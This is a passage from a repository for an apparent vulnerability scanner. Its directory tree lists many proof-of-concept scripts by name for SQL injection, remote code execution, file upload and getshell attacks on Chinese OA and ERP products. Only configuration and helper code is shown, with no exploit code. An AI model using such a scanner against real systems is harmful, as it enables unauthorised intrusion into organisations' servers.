├── .gitattributes
├── .idea
├── .gitignore
├── FingerVulnScanner.iml
├── inspectionProfiles
│ ├── Project_Default.xml
│ └── profiles_settings.xml
├── misc.xml
├── modules.xml
└── vcs.xml
├── FingerVulnScanner.py
├── README.md
├── inc
├── __pycache__
│ ├── agent.cpython-311.pyc
│ ├── cms_detected.cpython-311.pyc
│ ├── cms_replace.cpython-311.pyc
│ ├── common.cpython-311.pyc
│ ├── config.cpython-311.pyc
│ ├── console.cpython-311.pyc
│ ├── generate_random.cpython-311.pyc
│ ├── icon.cpython-311.pyc
│ ├── init.cpython-311.pyc
│ ├── output.cpython-311.pyc
│ ├── run.cpython-311.pyc
│ └── thread.cpython-311.pyc
├── agent.py
├── cms_detected.py
├── cms_replace.py
├── common.py
├── config.py
├── console.py
├── finger.json
├── generate_random.py
├── icon.py
├── import_plugin.py
├── init.py
├── output.py
├── run.py
└── thread.py
├── poc_model.txt
├── pocs
└── web
│ ├── OA
│ ├── fanwei
│ │ ├── TestFile_weaver_common_ctrl_upload.zip
│ │ ├── __pycache__
│ │ │ ├── fanwei_Bsh_rce.cpython-311.pyc
│ │ │ ├── fanwei_WorkflowCenterTreeData_sqli.cpython-311.pyc
│ │ │ └── fanwei_common_ctrl_upload.cpython-311.pyc
│ │ ├── ebridge
│ │ │ ├── __pycache__
│ │ │ │ ├── fanwei_ebridge_addResume_fileupload.cpython-311.pyc
│ │ │ │ └── fanwei_ebridge_addTaste_sqli.cpython-311.pyc
│ │ │ ├── fanwei_ebridge_addResume_fileupload.py
│ │ │ └── fanwei_ebridge_addTaste_sqli.py
│ │ ├── ecology
│ │ │ ├── __pycache__
│ │ │ │ ├── fanwei_cology_FileDownload_lfi.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_CptDwrUtil_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_Getdata_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_HrmCareerApplyPerView_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_HrmService_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_KtreeUploadAction_fileupload.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_LoginSSO_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_ProcessOverRequestByXml_lfi.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_ResourceServlet_lfi.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_SignatureDownLoad_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_SptmForPortalThumbnail_lfi.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_WorkPlanService_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_WorkflowServiceXml_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_XmlRpcServlet_lfi.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_browser_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_getE9DevelopAllNameValue2_lfi.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_getLabelByModule_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_getsqldata_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_jqueryFileTree_direct.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_setup_unauth.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_uploadOperation_fileupload_2022.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_v8_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_ecology_verifyquicklogin_loginbypass_2022.cpython-311.pyc
│ │ │ │ └── fanwei_ecology_workflowservicexml_rce.cpython-311.pyc
│ │ │ ├── fanwei_cology_FileDownload_lfi.py
│ │ │ ├── fanwei_ecology_CptDwrUtil_sqli.py
│ │ │ ├── fanwei_ecology_Getdata_sqli.py
│ │ │ ├── fanwei_ecology_HrmCareerApplyPerView_sqli.py
│ │ │ ├── fanwei_ecology_HrmService_sqli.py
│ │ │ ├── fanwei_ecology_KtreeUploadAction_fileupload.py
│ │ │ ├── fanwei_ecology_LoginSSO_sqli.py
│ │ │ ├── fanwei_ecology_ProcessOverRequestByXml_lfi.py
│ │ │ ├── fanwei_ecology_ResourceServlet_lfi.py
│ │ │ ├── fanwei_ecology_SignatureDownLoad_sqli.py
│ │ │ ├── fanwei_ecology_SptmForPortalThumbnail_lfi.py
│ │ │ ├── fanwei_ecology_WorkPlanService_sqli.py
│ │ │ ├── fanwei_ecology_WorkflowServiceXml_sqli.py
│ │ │ ├── fanwei_ecology_XmlRpcServlet_lfi.py
│ │ │ ├── fanwei_ecology_browser_sqli.py
│ │ │ ├── fanwei_ecology_getE9DevelopAllNameValue2_lfi.py
│ │ │ ├── fanwei_ecology_getLabelByModule_sqli.py
│ │ │ ├── fanwei_ecology_getsqldata_sqli.py
│ │ │ ├── fanwei_ecology_jqueryFileTree_direct.py
│ │ │ ├── fanwei_ecology_setup_unauth.py
│ │ │ ├── fanwei_ecology_uploadOperation_fileupload_2022.py
│ │ │ ├── fanwei_ecology_v8_sqli.py
│ │ │ ├── fanwei_ecology_verifyquicklogin_loginbypass_2022.py
│ │ │ └── fanwei_ecology_workflowservicexml_rce.py
│ │ ├── emobile
│ │ │ ├── __pycache__
│ │ │ │ ├── fanwei_emobile_client_rce.cpython-311.pyc
│ │ │ │ ├── fanwei_emobile_lang2sql_fileupload.cpython-311.pyc
│ │ │ │ └── fanwei_emobile_messageType_rce.cpython-311.pyc
│ │ │ ├── fanwei_emobile_client_rce.py
│ │ │ ├── fanwei_emobile_lang2sql_fileupload.py
│ │ │ └── fanwei_emobile_messageType_rce.py
│ │ ├── eoffice
│ │ │ ├── __pycache__
│ │ │ │ ├── fanwei_eoffice_OfficeServer_fileupload.cpython-311.pyc
│ │ │ │ ├── fanwei_eoffice_UploadFile_fileupload.cpython-311.pyc
│ │ │ │ ├── fanwei_eoffice_UserSelect_unauth.cpython-311.pyc
│ │ │ │ ├── fanwei_eoffice_atuh-file_rce.cpython-311.pyc
│ │ │ │ ├── fanwei_eoffice_config_2_unauth.cpython-311.pyc
│ │ │ │ ├── fanwei_eoffice_json_common_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_eoffice_jx2_config_unauth.cpython-311.pyc
│ │ │ │ ├── fanwei_eoffice_leave_record_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_eoffice_login_other_sqli.cpython-311.pyc
│ │ │ │ ├── fanwei_eoffice_mobile_upload_save_fileupload.cpython-311.pyc
│ │ │ │ ├── fanwei_eoffice_schema_mysql_unauth.cpython-311.pyc
│ │ │ │ ├── fanwei_eoffice_uploadify_fileupload.cpython-311.pyc
│ │ │ │ └── fanwei_eoffice_webservice_file_upload.cpython-311.pyc
│ │ │ ├── fanwei_eoffice_OfficeServer_fileupload.py
│ │ │ ├── fanwei_eoffice_UploadFile_fileupload.py
│ │ │ ├── fanwei_eoffice_UserSelect_unauth.py
│ │ │ ├── fanwei_eoffice_atuh-file_rce.py
│ │ │ ├── fanwei_eoffice_config_2_unauth.py
│ │ │ ├── fanwei_eoffice_json_common_sqli.py
│ │ │ ├── fanwei_eoffice_jx2_config_unauth.py
│ │ │ ├── fanwei_eoffice_leave_record_sqli.py
│ │ │ ├── fanwei_eoffice_login_other_sqli.py
│ │ │ ├── fanwei_eoffice_mobile_upload_save_fileupload.py
│ │ │ ├── fanwei_eoffice_schema_mysql_unauth.py
│ │ │ ├── fanwei_eoffice_uploadify_fileupload.py
│ │ │ └── fanwei_eoffice_webservice_file_upload.py
│ │ ├── fanwei_Bsh_rce.py
│ │ ├── fanwei_WorkflowCenterTreeData_sqli.py
│ │ └── fanwei_common_ctrl_upload.py
│ ├── landray
│ │ ├── __pycache__
│ │ │ ├── landray-eis-doc_fileedit_word-sqli.cpython-311.pyc
│ │ │ ├── landray-eis-frm_button_func-sqli.cpython-311.pyc
│ │ │ ├── landray-eis-rpt_listreport_definefield-sqli.cpython-311.pyc
│ │ │ ├── landray_oa-dataxml_rce.cpython-311.pyc
│ │ │ ├── landray_oa_WechatLoginHelper_sqli.cpython-311.pyc
│ │ │ ├── landray_oa_admindo_jndiinject_2021.cpython-311.pyc
│ │ │ ├── landray_oa_custom_jsp_fileread.cpython-311.pyc
│ │ │ ├── landray_oa_treexml_rce_2022.cpython-311.pyc
│ │ │ ├── landray_sysUiComponent_fileupload.cpython-311.pyc
│ │ │ ├── landray_treexml_rce.cpython-311.pyc
│ │ │ ├── landry-eis-ShowUserInfo-sqli.cpython-311.pyc
│ │ │ ├── landry-eis-UniformEntry-sqli.cpython-311.pyc
│ │ │ ├── landry-eis-fl_define_flow_chart_show-sqli.cpython-311.pyc
│ │ │ ├── landry-eis-frm_form_list_main-sqli.cpython-311.pyc
│ │ │ ├── landry-eis-saveImg-fileupload.cpython-311.pyc
│ │ │ └── landry_oa_sysUiExtend_fileupload.cpython-311.pyc
│ │ ├── landray-eis-doc_fileedit_word-sqli.py
│ │ ├── landray-eis-frm_button_func-sqli.py
│ │ ├── landray-eis-rpt_listreport_definefield-sqli.py
│ │ ├── landray_oa-dataxml_rce.py
│ │ ├── landray_oa_WechatLoginHelper_sqli.py
│ │ ├── landray_oa_admindo_jndiinject_2021.py
│ │ ├── landray_oa_custom_jsp_fileread.py
│ │ ├── landray_oa_treexml_rce_2022.py
│ │ ├── landray_sysUiComponent_fileupload.py
│ │ ├── landray_treexml_rce.py
│ │ ├── landry-eis-ShowUserInfo-sqli.py
│ │ ├── landry-eis-UniformEntry-sqli.py
│ │ ├── landry-eis-fl_define_flow_chart_show-sqli.py
│ │ ├── landry-eis-frm_form_list_main-sqli.py
│ │ ├── landry-eis-saveImg-fileupload.py
│ │ └── landry_oa_sysUiExtend_fileupload.py
│ ├── seeyon
│ │ ├── __pycache__
│ │ │ ├── seeyon_a6_sqli.cpython-311.pyc
│ │ │ ├── seeyon_get_sessionslist.cpython-311.pyc
│ │ │ ├── seeyon_oa_a8_htmlofficeservlet_getshell.cpython-311.pyc
│ │ │ ├── seeyon_oa_ajaxdo_fileupload_2022.cpython-311.pyc
│ │ │ ├── seeyon_oa_wpsassistservlet_fileupload_2022.cpython-311.pyc
│ │ │ └── seeyon_thirdpartycontroller_getshell.cpython-311.pyc
│ │ ├── seeyon_a6_sqli.py
│ │ ├── seeyon_get_sessionslist.py
│ │ ├── seeyon_oa_a8_htmlofficeservlet_getshell.py
│ │ ├── seeyon_oa_ajaxdo_fileupload_2022.py
│ │ ├── seeyon_oa_wpsassistservlet_fileupload_2022.py
│ │ └── seeyon_thirdpartycontroller_getshell.py
│ ├── tongda
│ │ ├── __pycache__
│ │ │ ├── tongda_down_lfi.cpython-311.pyc
│ │ │ ├── tongda_getdata_rce.cpython-311.pyc
│ │ │ ├── tongda_oa_2016_fileupload.cpython-311.pyc
│ │ │ ├── tongda_oa_fake_user.cpython-311.pyc
│ │ │ ├── tongda_oa_fileinclude_2020.cpython-311.pyc
│ │ │ ├── tongda_oa_qyapp-vote-submit_sqli.cpython-311.pyc
│ │ │ ├── tongda_oa_v11-8_apialiphp_fileupload.cpython-311.pyc
│ │ │ ├── tongda_sqli_getdata_php.cpython-311.pyc
│ │ │ └── tongda_videofile_fileread.cpython-311.pyc
│ │ ├── tongda_down_lfi.py
│ │ ├── tongda_getdata_rce.py
│ │ ├── tongda_oa_2016_fileupload.py
│ │ ├── tongda_oa_fake_user.py
│ │ ├── tongda_oa_fileinclude_2020.py
│ │ ├── tongda_oa_qyapp-vote-submit_sqli.py
│ │ ├── tongda_oa_v11-8_apialiphp_fileupload.py
│ │ ├── tongda_sqli_getdata_php.py
│ │ └── tongda_videofile_fileread.py
│ └── yongyou
│ │ ├── CRM
│ │ ├── __pycache__
│ │ │ ├── yongyou_crm_downloadfile_lfi.cpython-311.pyc
│ │ │ ├── yongyou_crm_getemaildata_fileupload.cpython-311.pyc
│ │ │ ├── yongyou_crm_help2_lfi.cpython-311.pyc
│ │ │ ├── yongyou_crm_reservationcomplete.cpython-311.pyc
│ │ │ ├── yongyou_crm_swfupload__fileupload.cpython-311.pyc
│ │ │ └── yongyou_crm_uploadfile_fileupload.cpython-311.pyc
│ │ ├── yongyou_crm_downloadfile_lfi.py
│ │ ├── yongyou_crm_getemaildata_fileupload.py
│ │ ├── yongyou_crm_help2_lfi.py
│ │ ├── yongyou_crm_reservationcomplete.py
│ │ ├── yongyou_crm_reservationcomplete_rce.py
│ │ ├── yongyou_crm_swfupload__fileupload.py
│ │ └── yongyou_crm_uploadfile_fileupload.py
│ │ ├── KSOA
│ │ ├── __pycache__
│ │ │ ├── yongyou_ksoa_PreviewKPQT_sqli.cpython-311.pyc
│ │ │ ├── yongyou_ksoa_PrintZPFB_sqli.cpython-311.pyc
│ │ │ ├── yongyou_ksoa_PrintZPYG_sqli.cpython-311.pyc
│ │ │ ├── yongyou_ksoa_PrintZPZP_sqli.cpython-311.pyc
│ │ │ ├── yongyou_ksoa_QueryService_sqli.cpython-311.pyc
│ │ │ ├── yongyou_ksoa_linkadd_sqli.cpython-311.pyc
│ │ │ ├── yongyou_ksoa_magefield_sqli.cpython-311.pyc
│ │ │ └── yongyou_ufida_ksoa_fileupload_2022.cpython-311.pyc
│ │ ├── yongyou_ksoa_PreviewKPQT_sqli.py
│ │ ├── yongyou_ksoa_PrintZPFB_sqli.py
│ │ ├── yongyou_ksoa_PrintZPYG_sqli.py
│ │ ├── yongyou_ksoa_PrintZPZP_sqli.py
│ │ ├── yongyou_ksoa_QueryService_sqli.py
│ │ ├── yongyou_ksoa_linkadd_sqli.py
│ │ ├── yongyou_ksoa_magefield_sqli.py
│ │ └── yongyou_ufida_ksoa_fileupload_2022.py
│ │ ├── __pycache__
│ │ ├── yongyou_government_affairs_FileDownload_lfi.cpython-311.pyc
│ │ └── yongyou_u9_PatchFile_fileupload.cpython-311.pyc
│ │ ├── changjietong
│ │ ├── __pycache__
│ │ │ ├── yongyou_changjietong_CheckMutex_sqli.cpython-311.pyc
│ │ │ ├── yongyou_changjietong_DownloadProxy_lfi.cpython-311.pyc
│ │ │ ├── yongyou_changjietong_Edit_sqli.cpython-311.pyc
│ │ │ ├── yongyou_changjietong_InitServerInfo_sqli.cpython-311.pyc
│ │ │ ├── yongyou_changjietong_RRATableController_rce.cpython-311.pyc
│ │ │ ├── yongyou_changjietong_create_site_sqli.cpython-311.pyc
│ │ │ └── yongyou_changjietong_login_sqli.cpython-311.pyc
│ │ ├── yongyou_changjietong_CheckMutex_sqli.py
│ │ ├── yongyou_changjietong_DownloadProxy_lfi.py
│ │ ├── yongyou_changjietong_Edit_sqli.py
│ │ ├── yongyou_changjietong_InitServerInfo_sqli.py
│ │ ├── yongyou_changjietong_RRATableController_rce.py
│ │ ├── yongyou_changjietong_create_site_sqli.py
│ │ └── yongyou_changjietong_login_sqli.py
│ │ ├── grp-u8
│ │ ├── __pycache__
│ │ │ ├── yongyou_grp-u8_FileUpload_fileupload.cpython-311.pyc
│ │ │ ├── yongyou_grp-u8_UploadFileData_fileupload.cpython-311.pyc
│ │ │ ├── yongyou_grp-u8_operOriztion_sqli.cpython-311.pyc
│ │ │ └── yongyou_grp-u8_proxy_xxe-sqli_2022.cpython-311.pyc
│ │ ├── yongyou_grp-u8_FileUpload_fileupload.py
│ │ ├── yongyou_grp-u8_UploadFileData_fileupload.py
│ │ ├── yongyou_grp-u8_operOriztion_sqli.py
│ │ └── yongyou_grp-u8_proxy_xxe-sqli_2022.py
│ │ ├── nc
│ │ ├── __pycache__
│ │ │ ├── yongyou_nc-find-web_fileread.cpython-311.pyc
│ │ │ ├── yongyou_nc_FileManager_fileupload.cpython-311.pyc
│ │ │ ├── yongyou_nc_avatar_fileupload.cpython-311.pyc
│ │ │ ├── yongyou_nc_aveXmlToFIleServlet_fileupload.cpython-311.pyc
│ │ │ ├── yongyou_nc_bill_sqli.cpython-311.pyc
│ │ │ ├── yongyou_nc_blobRefClassSea_rce.cpython-311.pyc
│ │ │ ├── yongyou_nc_downCourseWare_lfi.cpython-311.pyc
│ │ │ ├── yongyou_nc_download_lfi.cpython-311.pyc
│ │ │ ├── yongyou_nc_download_sqli.cpython-311.pyc
│ │ │ ├── yongyou_nc_file-receive-servlet_fileupload_2021.cpython-311.pyc
│ │ │ ├── yongyou_nc_fileserver_loginbypass.cpython-311.pyc
│ │ │ ├── yongyou_nc_fileupload_2022.cpython-311.pyc
│ │ │ ├── yongyou_nc_grouptemplet_fileupload.cpython-311.pyc
│ │ │ ├── yongyou_nc_importhttpscer_fileupload.cpython-311.pyc
│ │ │ ├── yongyou_nc_jsinvoke_fileupload.cpython-311.pyc
│ │ │ ├── yongyou_nc_queryPsnInfo_sqli.cpython-311.pyc
│ │ │ ├── yongyou_nc_queryStaffByName_sqli.cpython-311.pyc
│ │ │ ├── yongyou_nc_querygoodsgridbycode_sqli.cpython-311.pyc
│ │ │ ├── yongyou_nc_rce_2022.cpython-311.pyc
│ │ │ ├── yongyou_nc_runStateServlet_sqli.cpython-311.pyc
│ │ │ ├── yongyou_nc_saveImageServlet_fileupload.cpython-311.pyc
│ │ │ ├── yongyou_nc_showcontent_sqli.cpython-311.pyc
│ │ │ ├── yongyou_nc_soapFormat_xxe.cpython-311.pyc
│ │ │ ├── yongyou_nc_uploadChunk _fileupload.cpython-311.pyc
│ │ │ ├── yongyou_nc_uploadControl_fileupload.cpython-311.pyc
│ │ │ ├── yongyou_nc_warningDetailInfo_sqli.cpython-311.pyc
│ │ │ └── yongyou_nc_workflowImageServlet_sqli.cpython-311.pyc
│ │ ├── yongyou_nc-find-web_fileread.py
│ │ ├── yongyou_nc_FileManager_fileupload.py
│ │ ├── yongyou_nc_avatar_fileupload.py
│ │ ├── yongyou_nc_aveXmlToFIleServlet_fileupload.py
│ │ ├── yongyou_nc_bill_sqli.py
│ │ ├── yongyou_nc_blobRefClassSea_rce.py
│ │ ├── yongyou_nc_downCourseWare_lfi.py
│ │ ├── yongyou_nc_download_lfi.py
│ │ ├── yongyou_nc_download_sqli.py
│ │ ├── yongyou_nc_file-receive-servlet_fileupload_2021.py
│ │ ├── yongyou_nc_fileserver_loginbypass.py
│ │ ├── yongyou_nc_fileupload_2022.py
│ │ ├── yongyou_nc_grouptemplet_fileupload.py
│ │ ├── yongyou_nc_importhttpscer_fileupload.py
│ │ ├── yongyou_nc_jsinvoke_fileupload.py
│ │ ├── yongyou_nc_queryPsnInfo_sqli.py
│ │ ├── yongyou_nc_queryStaffByName_sqli.py
│ │ ├── yongyou_nc_querygoodsgridbycode_sqli.py
│ │ ├── yongyou_nc_rce_2022.py
│ │ ├── yongyou_nc_runStateServlet_sqli.py
│ │ ├── yongyou_nc_saveImageServlet_fileupload.py
│ │ ├── yongyou_nc_showcontent_sqli.py
│ │ ├── yongyou_nc_smartweb2.RPC.d_xml.py
│ │ ├── yongyou_nc_soapFormat_xxe.py
│ │ ├── yongyou_nc_uploadChunk _fileupload.py
│ │ ├── yongyou_nc_uploadControl_fileupload.py
│ │ ├── yongyou_nc_warningDetailInfo_sqli.py
│ │ ├── yongyou_nc_word.docx_lfi.py
│ │ ├── yongyou_nc_workflowImageServlet_sqli.py
│ │ └── yongyou_ncsaveDoc.ajax_fileupload.py
│ │ ├── u8
│ │ ├── __pycache__
│ │ │ ├── yongyou_u8_FileServlet_lfi.cpython-311.pyc
│ │ │ ├── yongyou_u8_KeyWordDetailReportQuery_sqli.cpython-311.pyc
│ │ │ ├── yongyou_u8_KeyWordReportQuery_sqli.cpython-311.pyc
│ │ │ ├── yongyou_u8_MeasQueryConditionFrameAction_sqli.cpython-311.pyc
│ │ │ ├── yongyou_u8_RegisterServlet_sqli.cpython-311.pyc
│ │ │ ├── yongyou_u8_ServiceDispatcherServlet_deserialization.cpython-311.pyc
│ │ │ ├── yongyou_u8_base64_sqli.cpython-311.pyc
│ │ │ ├── yongyou_u8_doUpload_fileupload.cpython-311.pyc
│ │ │ ├── yongyou_u8_linkntb_sqli.cpython-311.pyc
│ │ │ ├── yongyou_u8_runScript_sqli.cpython-311.pyc
│ │ │ ├── yongyou_u8_showRPCLoadingTip_xxe.cpython-311.pyc
│ │ │ └── yongyou_u8_upload_fileupload.cpython-311.pyc
│ │ ├── yongyou_u8_FileServlet_lfi.py
│ │ ├── yongyou_u8_KeyWordDetailReportQuery_sqli.py
│ │ ├── yongyou_u8_KeyWordReportQuery_sqli.py
│ │ ├── yongyou_u8_MeasQueryConditionFrameAction_sqli.py
│ │ ├── yongyou_u8_RegisterServlet_sqli.py
│ │ ├── yongyou_u8_ServiceDispatcherServlet_deserialization.py
│ │ ├── yongyou_u8_base64_sqli.py
│ │ ├── yongyou_u8_doUpload_fileupload.py
│ │ ├── yongyou_u8_linkntb_sqli.py
│ │ ├── yongyou_u8_login2.RegisterServlet_sqli.py
│ │ ├── yongyou_u8_runScript_sqli.py
│ │ ├── yongyou_u8_showRPCLoadingTip_xxe.py
│ │ └── yongyou_u8_upload_fileupload.py
│ │ ├── u9
│ │ ├── __pycache__
│ │ │ ├── yongyou_u9_DoQuery_sqli.cpython-311.pyc
│ │ │ ├── yongyou_u9_GetConnectionString_infoleak.cpython-311.pyc
│ │ │ ├── yongyou_u9_PatchFile_fileupload.cpython-311.pyc
│ │ │ └── yongyou_u9_UMWebService_lfi.cpython-311.pyc
│ │ ├── yongyou_u9_DoQuery_sqli.py
│ │ ├── yongyou_u9_GetConnectionString_infoleak.py
│ │ ├── yongyou_u9_PatchFile_fileupload.py
│ │ └── yongyou_u9_UMWebService_lfi.py
│ │ ├── ufida
│ │ ├── __pycache__
│ │ │ ├── yongyou_ufida_ELTextFile_lfi.cpython-311.pyc
│ │ │ ├── yongyou_ufida_getFileLocal_lfi.cpython-311.pyc
│ │ │ ├── yongyou_ufida_uploadApk_fileupload.cpython-311.pyc
│ │ │ └── yongyou_ufida_uploadIcon_fileupload.cpython-311.pyc
│ │ ├── yongyou_ufida_ELTextFile_lfi.py
│ │ ├── yongyou_ufida_getFileLocal_lfi.py
│ │ ├── yongyou_ufida_uploadApk_fileupload.py
│ │ └── yongyou_ufida_uploadIcon_fileupload.py
│ │ ├── yongyou_government_affairs_FileDownload_lfi.py
│ │ └── yongyou_u9_PatchFile_fileupload.py
│ └── esafenet
│ ├── __pycache__
│ ├── esafenet_CDGAuthoriseTempletService1_sqli.cpython-311.pyc
│ ├── esafenet_DecryptApplication_lfi.cpython-311.pyc
│ ├── esafenet_DecryptionApp_rce.cpython-311.pyc
│ ├── esafenet_UploadFileManagerService_lfi.cpython-311.pyc
│ └── esafenet_dataimport_rce.cpython-311.pyc
│ ├── esafenet_CDGAuthoriseTempletService1_sqli.py
│ ├── esafenet_DecryptApplication_lfi.py
│ ├── esafenet_DecryptionApp_rce.py
│ ├── esafenet_UploadFileManagerService_lfi.py
│ └── esafenet_dataimport_rce.py
└── requirements.txt
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 |
--------------------------------------------------------------------------------
/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # 默认忽略的文件
2 | /shelf/
3 | /workspace.xml
4 | # 基于编辑器的 HTTP 客户端请求
5 | /httpRequests/
6 | # Datasource local storage ignored files
7 | /dataSources/
8 | /dataSources.local.xml
9 |
--------------------------------------------------------------------------------
/.idea/FingerVulnScanner.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
--------------------------------------------------------------------------------
/.idea/inspectionProfiles/Project_Default.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
17 |
18 |
19 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/.idea/inspectionProfiles/profiles_settings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/FingerVulnScanner.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding=utf-8
3 |
4 |
5 | from inc import console
6 |
7 | def main():
8 |
9 | console.console()
10 |
11 | if __name__ == '__main__':
12 | main()
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/inc/__pycache__/agent.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/__pycache__/agent.cpython-311.pyc
--------------------------------------------------------------------------------
/inc/__pycache__/cms_detected.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/__pycache__/cms_detected.cpython-311.pyc
--------------------------------------------------------------------------------
/inc/__pycache__/cms_replace.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/__pycache__/cms_replace.cpython-311.pyc
--------------------------------------------------------------------------------
/inc/__pycache__/common.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/__pycache__/common.cpython-311.pyc
--------------------------------------------------------------------------------
/inc/__pycache__/config.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/__pycache__/config.cpython-311.pyc
--------------------------------------------------------------------------------
/inc/__pycache__/console.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/__pycache__/console.cpython-311.pyc
--------------------------------------------------------------------------------
/inc/__pycache__/generate_random.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/__pycache__/generate_random.cpython-311.pyc
--------------------------------------------------------------------------------
/inc/__pycache__/icon.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/__pycache__/icon.cpython-311.pyc
--------------------------------------------------------------------------------
/inc/__pycache__/init.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/__pycache__/init.cpython-311.pyc
--------------------------------------------------------------------------------
/inc/__pycache__/output.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/__pycache__/output.cpython-311.pyc
--------------------------------------------------------------------------------
/inc/__pycache__/run.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/__pycache__/run.cpython-311.pyc
--------------------------------------------------------------------------------
/inc/__pycache__/thread.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/__pycache__/thread.cpython-311.pyc
--------------------------------------------------------------------------------
/inc/config.py:
--------------------------------------------------------------------------------
1 | # FingerVulnScanner config
2 |
3 | # 进度显示(默认开启)
4 | show_progress = True
5 | # 输出文件(默认为空)
6 | output_path = r''
7 |
8 | # 线程池最大数量
9 | max_threads = 30
10 | # 单条poc最大超时
11 | timeout = 13
12 | # 休眠间隔(默认不休眠,如开启线程默认1)
13 | delay = 0
14 |
15 |
16 |
17 |
--------------------------------------------------------------------------------
/inc/generate_random.py:
--------------------------------------------------------------------------------
1 | import random
2 |
3 |
4 | def generate_random_str(randomlength=16):
5 | """
6 | 生成一个指定长度的随机字符串
7 | """
8 | random_str = ''
9 | base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'
10 | length = len(base_str) - 1
11 | for i in range(randomlength):
12 | random_str += base_str[random.randint(0, length)]
13 | return random_str
14 |
15 |
16 | def generate_random_number(num_digits=5):
17 | if num_digits <= 0:
18 | raise ValueError("Number of digits must be a positive integer.")
19 |
20 | # 生成随机数的范围
21 | lower_bound = 10 ** (num_digits - 1)
22 | upper_bound = 10 ** num_digits - 1
23 |
24 | # 生成随机整数
25 | random_number = random.randint(lower_bound, upper_bound)
26 |
27 | # 转换为字符串格式
28 | random_number_str = str(random_number)
29 |
30 | return random_number_str
31 |
--------------------------------------------------------------------------------
/inc/import_plugin.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/inc/import_plugin.py
--------------------------------------------------------------------------------
/inc/run.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding=utf-8
3 | from inc import init
4 | from inc import thread, common
5 | # 禁用https报错
6 | from urllib3.exceptions import InsecureRequestWarning
7 | from urllib3 import disable_warnings
8 |
9 | disable_warnings(InsecureRequestWarning)
10 |
11 |
12 | def verify(target, script_list):
13 | thread_pool = thread.ThreadPool()
14 | for script in script_list:
